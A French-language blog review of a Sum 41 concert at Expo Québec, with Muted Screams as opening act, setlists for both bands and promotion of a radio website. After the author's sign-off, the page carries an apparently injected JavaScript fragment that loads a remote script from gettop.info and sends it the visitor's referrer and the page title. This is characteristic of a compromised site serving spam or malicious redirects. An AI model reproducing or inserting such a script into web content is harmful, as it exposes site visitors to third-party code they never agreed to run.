Étant fan de Sum 41 depuis plusieurs années, j’étais assez content de voir qu’ils étaient de retour à Québec dans le cadre de l’Expo Québec. Surtout que le band n’est pas en ‘’tournée officielle’’, ça rajoute donc un cachet de plus à la surprise que les organisateurs nous on fait cette année. J’étais de plus content de savoir que c’est le groupe Muted Screams qui ouvre le bal pour cette soirée. Est-ce que cette soirée fut une réussite ? C’est ce que je vais vous dévoiler dans les prochaines lignes…

Muted Screams : L’organisation de l’Expo Québec a joué un excellent coup ici en permettant à un band local de jouer en première partie d’un groupe populaire comme Sum 41. Imaginez-vous la visibilité que le band a eue devant une aussi grande foule. Muted Screams est un groupe rock formé en 2007 à Ste-Marie de Beauce et qui ont débuté leur lancé médiatique sur les radios de Québec en 2011. J’avais hâte d’entendre ce que les musiciens avaient à donner car j’en avais entendu que des bonnes choses et après quelques écoutes sur YouTube, je trouvais ça excellent. Dès les premières notes, on pouvait tous ce dire la même chose…bon sang que Mélanie Gagné (chanteuse et guitariste) est charismatique. Elle maîtrise parfaitement sa voix en passant d’une voix un peu plus grave à une voix aiguë sans difficulté et sans problèmes. Tout ça en faisant des riffs de guitares plus fous les uns que les autres sans jamais se tromper. Dans le groupe il y avait aussi le batteur L-P Laroche qui était aussi très énergique. À plusieurs reprises il est pratiquement grimpé sur son drum pour en jouer encore plus fort qu’à la normal. L’autre guitariste lui, Charles-Alexandre Beaudoin, était un peu plus réservé sur scène mais ça n’enlevait à rien qu’il exécutait ses riffs et solo à la perfection et sans accrochages. Cette soirée marquait aussi le premier show du nouveau basiste Étien Desnoyers. Il a été à la hauteur de sa première fois et tout a été parfait pour lui. Il était quand même énergique sur scène et avait un certains charisme également. Si on n’avait pas su que c’était sa première fois, jamais on aurait pu s’en douter. Le band semblait vraiment content de jouer devant une aussi grande foule et surtout devant un groupe aussi populaire que Sum 41 et ça paraissait. Vers la fin du spectacle, L-P, le drummer, c’est levé et a dit ‘’ Ouvrez les lumières de la foule car ici on voit fuck all et ce n’est pas souvent qu’on a la chance de voir ça’’. Chose faite, L-P a tenu à remercier l’organisation d’avoir encouragé un band local pour une aussi grosse soirée et qu’ils étaient tous heureux de jouer pour nous. Malheureusement, la foule était très calme durant le set de Muted Screams. Il y a eu des débuts de Mushpits durant Champagne et Van Houte. Pour terminer leur set, le band a joué un cover de Motley Crue, sois Kick Start My Heart, et croyez-moi la foule à très appréciée et c’est activée un peu plus. Malgré le fait que la foule a été sensiblement tranquille durant le set, elle a quand même beaucoup apprécié la prestation car après le show, beaucoup de gens se sont dirigés vers le stand de marchandises pour aller acheter un album et voir les membres du groupe. Pour ma part, je trouve qu’Ils ont été tous excellents et je suis sûr qu’Ils ont conquis beaucoup de nouveaux fans, dont moi le premier. Je vous invite tous à aller les écouter sur Youtube, et si vous aimez ce que vous entendez, aller sur leur page Facebook et parlez en le plus possible. Vous pouvez également visiter leur page web à l’adresse suivante: www.mutedscreams.com

Setlist de Muted Screams (voir photo ci-bas) :
-The End
– Waymo (abréviation de la chanson »What are You Made Of »)
– Strong Enough
– Tonight
– Champagne (nom fictif ou repère pour le band)
– Van Houte (nom fictif ou repère pour le band)
– Speak
– Ciboire (nom fictif ou repère pour le band)
– Deadwood
– Broken Wheel
– Kick Start My Heart ( Cover de Motley Crue )
11897155_10153510846735767_1320682676_n
🙂 vous remarquerez que certains titres ne sont que des repères pour le band et non des titres officiels. La raison est que ce sont de nouvelles chansons et elles n’ont pas encore de nom. Donc pour se donner un guide, les membres du groupes on nommé temporairement les différentes chansons selon ce qu’ils buvaient lors de leurs créations. Faut l’avouer, ça donne une belle setlist 🙂

Sum 41 : J’avais très hâte de revoir un de mes bands préférés monter sur scène, surtout après une petite période d’absence due à un congé maladie forcé pour Deryck, le chanteur et pentatoniste du groupe, qui a été gravement malade à cause de sa grande consommation d’alcool au courant des années passées. J’avais aussi très hâte de revoir Dave Baksh, le guitariste original du groupe, qui a annoncé son retour permanent au sein du groupe seulement quelques temps avant le spectacle à Québec. J’ai malheureusement été déçue de constater qu’il n’était pas présent pour leur spectacle à l’Expo Québec. Il voulait surement avoir plus de temps pour pratiquer étant donné qu’Il n’a pas été présent depuis plusieurs années (depuis 2006 plus précisément). Par contre, j’ai été agréablement surpris de voir l’énergie sur scène de Deryck dégageait. Il était énergique, semblait heureux d’être de retour dans la vieille capitale et semblait en pleine forme. Juste avant que leur set débute, une intro musicale c’est fait entendre avec la traditionnelle chanson ‘’TNT’’ qu’on entend régulièrement avant les shows de Sum 41. La foule c’est mise à ‘’trasher’’ et s’agiter follement durant cette intro musicale (ce qui laissait prévoir une soirée assez mouvementée). Laissez-moi vous dire que ça brassait beaucoup par endroits. Juste derrière moi, c’était assez débile. Il y avait même un gars avec une pancarte avec écrit dessus ‘’mushpit ici’’ et de l’autre côté ‘’Trash ou décaliss’’ donc pas besoins de vous dire que je suis sortis du spectacle tout en sueur et avec quelques maux de dos et de bras. Le groupe a commencé en force avec le hit Motivation. En 2012, le groupe était venu à l’impérial de Québec, pour jouer en entier, l’album ‘’Does this look infected?’’ Et quelques autres chansons mais cette fois-ci, la setlist était beaucoup plus variée et on pouvait autant apprécier les titres les plus récents que ceux du passé. J’ai remarqué que par moments, il y a eu des accrochages au niveau des riffs de guitare. Le rythme était aussi parfois différent des versions studios présents sur les albums, ce qui changeait beaucoup la donnée en live. J’ai aussi remarqué que quelques petits solos ont été supprimés lors de leur prestation. Deryck interagissait beaucoup beaucoup avec la foule, presque trop même. Presque toutes les chansons ont été interrompues par un speach de Deryck. C’est super que le band interagisse avec la foule, mais j’aurais plutôt attendu entre deux chansons au lieu de le faire juste avant d’en terminer une. Le son était excellent mise à part j’aurais peut-être baissé un petit peu la basse mais c’était rien de majeur. Au travers de la setlist de fou que le band nous a proposé, il y a même eu un medley de chansons de Metallica. Côté scène, on pouvait facilement voir que le groupe n’est pas en tournée officielle et que la venue à Québec était une petite exception. Il n’y avait aucun flag, aucun tag ou rien que ce soit à l’effigie du band. Une scène simple mais rien de grave car nous étions tous là pour réentendre nos chansons favorites. Chose qui ma déçus également, c’est qu’il n’y avait pas de marchandises de Sum 41. D’après certain dire, le site du spectacle de l’Expo Québec était complet. Selon ces mêmes sources, l’accès au spectacle était fermé ou presque. Il y avait sois disant plus de personnes qu’à Éric Lapointe et à ce spectacle, il y avait environs 10 500 personnes. Somme tout, comme les autres shows de Sum 41 que j’ai vu, j’en suis sorti plus que combler en espérant un retour dans un futur rapproché.

 

Setlist de Sum 41
-Motivation

– Over my Head
– Hell Song
– Scumfuck
– Ruby Soho (cover de Rancid)
– Summer
– Handle This
– We’re All to Blame
– Underclass Hero
– Walking Disaster
– Welcomme to Hell
– Sick of Everyone
– Screaming Bloody Murder
– Mr. Amsterdam
– Medley de Metallica (For Whom the bell tolls, Sandman & Master of Puppets)
– In Too Deep
– Still Waiting
à Encore ß
– My Direction
– Fat Lip
( on note ici l’absence de Pieces qui aurait dû être jouée selon leur setlist )

 

Au final, j’ai passé une excellente soirée encore une fois, quoi qu’un peu racker des différents mushpits et trash de la foule. Je suis sortis gagnant de cette soirée car j’ai en poche un nouveau band à écouter, sois Muted Screams, et j’ai pu revoir encore une fois un de mes band préféré, Sum 41. Malgré les petits bémols rencontrés lors de la prestation du groupe principal, ça n’enlève à rien que ce fût une soirée plus que réussie. Bravo et surtout merci à l’organisation de l’Expo Québec pour cette soirée mémorable qui a affiché sois disant complet.

N’oubliez pas de visiter notre site web www.ultimradio.com et de suivre les différentes actualités sur notre page Facebook et partagez en grand nombre.

Rock On !

Christopher.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;